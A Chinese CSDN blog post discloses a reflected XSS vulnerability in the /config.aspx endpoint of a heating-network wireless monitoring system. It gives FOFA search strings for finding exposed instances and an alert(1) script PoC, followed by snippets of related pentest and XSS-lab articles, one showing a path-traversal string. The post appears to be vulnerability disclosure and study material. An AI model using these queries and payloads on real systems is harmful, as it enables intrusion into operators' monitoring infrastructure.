热网无线监测系统/config.aspx接口存在反射性XSS漏洞

最新推荐文章于 2024-10-05 11:45:58 发布
最新推荐文章于 2024-10-05 11:45:58 发布
阅读量362 收藏
点赞数 8
文章标签: xss 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142690111
版权

漏洞描述

热网无线监测系统/config.aspx接口存在反射性XSS漏洞

漏洞复现

FOFA

body="Downloads/HDPrintInstall.rar" || body="skins/login/images/btn_login.jpg"

POC

IP+/config.aspx

POC

<script>alert(1)</script>

点击确认成功弹窗1

摸金校尉-马
关注
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3217
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
DVWA的搭建和使用
热门推荐
biobby的博客
07-26 4万+
2018.7.17 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分别是: Brute Force(暴力(破解)) Command Injection(命令行注入) CS...
渗透测试 ( 0 ) --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
freeking101的博客
06-12 4015
渗透测试 --- http协议、XSS、CSRF、文件上传、文件包含、反序列化漏洞
web漏洞总结大全(基础)
Ba1_Ma0的博客
01-20 2954
web漏洞总结大全(基础)
渗透测试 ( 1 ) --- 相关术语、必备 工具、导航、全流程总结、入侵网站思路
freeking101的博客
07-02 2万+
在学习某项技能的时,要用最快的时间摸索清楚最少必要知识 (MAKE)都有哪些? 然后迅速地掌握它们,这样就实现了 "快速入门",然后就可以开始动手实践,然后在实践中验证理论、加深理解,同时继续扩展学习。而学习黑客也是同样的道理,对于新手小白的第一课应该是以掌握基础的安全工具为主,这样在学习的同时可以进行实践,验证所学的知识,同时加以扩展,这样学习效率会大大提升.........................................................
渗透测试流程-全(仅供学习,知识分享)
流浪法师的博客
12-15 9737
文章仅供安全领域的朋友学习使用!!
WEB安全全基础漏洞学习
qq_62708558的博客
05-23 3316
web安全全基础漏洞学习
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1926
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
分享国外安全团队及工具
专注企业信息安全-sec
03-19 1万+
名称 版 描述 主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....
有用的工具续
weixin_34014277的博客
08-25 6004
前文 markdown https://ivarptr.github.io/yu-...Typora https://www.typora.io/ http://mark.uxwin.com/https://wordmarkapp.com/ 单词库 http://www.xsdict.cn/ 去广告 Hosts https://githu...
Pikachu-Cross-Site Scripting-xss盲打
guanrongl的专栏
10-03 357
xss盲打,不是一种漏洞类型,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;
PIKACHU | PIKACHU 靶场 XSS 后台配置
Blue17 の 小窝
09-30 875
PIKACHU 自带了一个 XSS 平台,可以辅助我们完成 XSS 攻击,但是该后台需要配置数据库以后才能使用。本教程,就是教大家如何配置 PIKACHU XSS 平台的。PIKACHU XSS 平台的配置流程主要分为以下三步:修改 PIKACHU 数据库配置文件。=> 修改过的可以跳过此步初始化 PIKACHU XSS 平台数据库。登录并使用 PIKACHU XSS 平台。
xss之dom类型
最新发布
m0_74741186的博客
10-05 387
上我们的pikachu。
Pikachu-xss防范措施 - href输出 & js输出
guanrongl的专栏
10-03 451
要想防止href 标签的xss : 一、可以做输入限定,只允许http 、https 的头的输入;二、结合输入限定后再做特殊字符转义。转义:所有输出到前端的数据,都根据输出点进行转义,比如输出到html中进行html实体转义,输入到 JS 里面的进行 JS 转义。过滤:根据业务需要进行过滤,如:输入点要求输入手机号,则只允许输入手机号格式的数字;从页面代码上看出,这是个href 标签,并且做了href特殊字符转换。核心点是:$ms == 'tmac'总体原则: 输入做过滤,输出做转义。
Pikachu-Cross-Site Scripting-反射型xss(get)
guanrongl的专栏
10-02 525
存储型XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类型的XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;
Pikichu-xss实验案例-通过xss获取cookie
guanrongl的专栏
10-02 375
查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。该后台可以把获得的cookie信息显示出来;pikachu提供了一个pkxss后台;
XSS基础
2302_81328699的博客
10-01 354
【代码】XSS基础
Pikachu-Cross-Site Scripting-xss之htmlspecialchars
guanrongl的专栏
10-03 234
查看页面元素,可以看到这里对一些符号做了转换,但是 单引号等几个符号没处理;提交,得到xss攻击。
%3f/../../../..
06-26
您的输入看起来像是试图访问一个URL路径的一部分,`%3f`通常表示URL编码中的问号字符`?`。当URL需要包含特殊字符时,会使用URL编码来确保它们被正确解析。`%3f`代表问号`?`,`../../../..`可能表示向上移动目录层级。 然而,直接在这里执行这样的操作可能会导致安全问题,因为它可能试图访问超出预期范围的文件或服务器资源。在实际应用中,这通常是用来构造URL查询字符串的部分,例如: ```python url = "http://example.com/%3f/../../../.." # 这样做通常是不安全的,因为可能会导致跨站脚本攻击(XSS)或其他类型的漏洞 # 正确做法应该是使用urlparse模块来构建URL from urllib.parse import urlparse, urljoin parsed_url = urlparse("http://example.com") relative_path = "/%3f/../../../.." absolute_path = urljoin(parsed_url.geturl(), relative_path) # 注意:这里的结果可能会导致URL泄漏敏感信息,仅用于示例 print(absolute_path) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值